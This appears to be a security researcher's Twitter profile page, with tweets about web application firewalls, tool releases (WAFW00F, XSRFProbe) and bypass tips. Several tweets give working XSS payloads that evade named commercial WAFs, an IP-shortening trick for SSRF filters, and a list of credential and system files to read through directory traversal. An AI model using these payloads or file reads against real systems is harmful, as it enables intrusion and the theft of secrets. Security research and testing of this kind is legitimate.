Infected Drake

@0xInfection

I am just an Infected Geek... ☣

/dev/null
Joined February 2018

Tweets

  1. Pinned Tweet
    8 Jul 2019

    I learnt today that IP addresses can be shortened by dropping the zeroes. Examples:
    http://1.0.0.1 → http://1.1
    http://192.168.0.1 → http://192.168.1
    This bypasses WAF filters for SSRF, open-redirect, etc where any IP as input gets blacklisted.

  2. 29 Jan

    WAFW00F v2.1 is just out! Got a json/csv/txt file having a list of sites which needs to be tested for WAFs? Want a decent output in json/csv? We got you covered!
    wafw00f -i file.{json|csv|txt} -o file.{txt|csv|json}

  3. 20 Jan

    [WAF Bypass Tip] Often WAF devs. include some sort of shared secret as a whitelist string. If the WAF has some kind of open-source version, try going through the source looking for it. Once found, you have the killswitch in your hand. 😎

  4. Retweeted
    10 Jan

    WAFW00F : Allows one to identify and fingerprint Web Application Firewall (WAF) products protecting a website : cc ||

  5. Retweeted
    6 Jan

    WAF bypass payload against Firefox by <image src\r\n=valid.jpg onloadend='new class extends (co\u006efir\u006d)/**/`` &lcub;&rcub;'>

  6. 5 Jan

    Wooo! Tested this amongst a couple of other WAFs and it bypasses Dotdefender, Comodo and a couple of other WAFs too. Payload seems quite lethal! :) NOTE: Payload seems to be Firefox only. :/

  7. 5 Jan

    Observed a weird WAF bypass case:
    > WAF blocked <img> tag
    > 'src' attr got blocked too
    > Found WAF didn't block <image>
    Finally crafted: <image src\r\n=valid.jpg onloadend='new class extends (co\u006efir\u006d)/**/`` &lcub;&rcub;'>
    > BOOM

  8. 3 Jan

    Verifying myself: I am 0xinfection on . nKL89qKXoVEXp6-Ahycj_zizwIqQLdQ4Sqy- /

  9. 1 Jan

    Why not step into the next decade with WAF bypasses? Here are some gifts.😎
    - Imperva <a69/onclick=write&lpar;&rpar;>pew
    - DotDefender <a69/onclick=[0].map(alert)>pew
    - Cloudbric <a69/onclick=[1].findIndex(alert)>pew
    Happy 0x32303230.😉

  10. 13 Dec 2019

    If you wish to try it out, get it here: Feedbacks appreciated! :)

  11. 13 Dec 2019

    With more than 300 commits and hard work for the past few months, I am happy to finally announce that WAFW00F v2.0 (Emporium) release is out. WAFW00F can now accurately fingerprint 150+ WAFs out there (largest fingerprint database till now).

  12. Retweeted
    26 Feb 2019

    So as promised, I am open-sourcing my own collection on WAFs as an awesome list. I still feel the collection is pretty incomplete. There is a lot *eyes closed* left to add to it.

  13. 10 Nov 2019

    Hey folks, v2.1.1 of XSRFProbe is out! \o/ So whether you're stuck at an endpoint with forms in it or looking to learn about how cross site request forgeries (CSRF) work, give this toolkit a try. 😉

  14. Retweeted
    28 Oct 2019

    Imperva WAF bypass by <bleh/onclick=top[/al/.source+/ert/.source]&Tab;``>click

  15. 26 Oct 2019

    Messed with the WAF a few days ago and crafted some bypasses. Here is an XSS payload which bypasses the Imperva WAF. <bleh/onclick=top[/al/.source+/ert/.source]&Tab;``>click P.S. - Didn't expect Imperva to pop so easily. :p

  16. 15 Oct 2019

    I wrote up a small script to return a single instance of a URL from a (huge) list of URLs irrespective of their parameter values. Useful in cases where you need to sort out URLs obtained from the wayback machine. Thanks to for the assignment. :)

  17. 9 Oct 2019

    Need a server which restarts itself after every single request? Set it up using netcat via this one-liner! 😉
    while :; do (echo -ne "HTTP/1.1 200 OK\r\nContent-Length: $(wc -c <index.html)\r\n\r\n"; cat index.html) | nc -l -p 8080; done

  18. 4 Oct 2019

    Other interesting files you should have a look:
    /proc/mounts
    /proc/net/arp
    /etc/motd
    /etc/mysql/my.cnf
    /proc/net/route
    /proc/sched_debug
    /proc/self/environ
    /home/$USER/.bash_history
    /home/$USER/.ssh/id_rsa
    /var/run/secrets/kubernetes.io/serviceaccount
    /proc/self/cwd/index.php

  19. 4 Oct 2019

    Got a directory traversal? Don't forget to check out /proc/[0-9]*/fd/[0-9]* for more juicy info!

  20. 18 Aug 2019

    And a big thanks to for reviewing the article. :)

  21. 18 Aug 2019

    After weeks of research and experimentation with timing based side channel attacks on WAFs, I'm finally glad to present an article detailing my experiments. I hope you enjoy reading it as much as I enjoyed writing it up. Feedbacks appreciated.

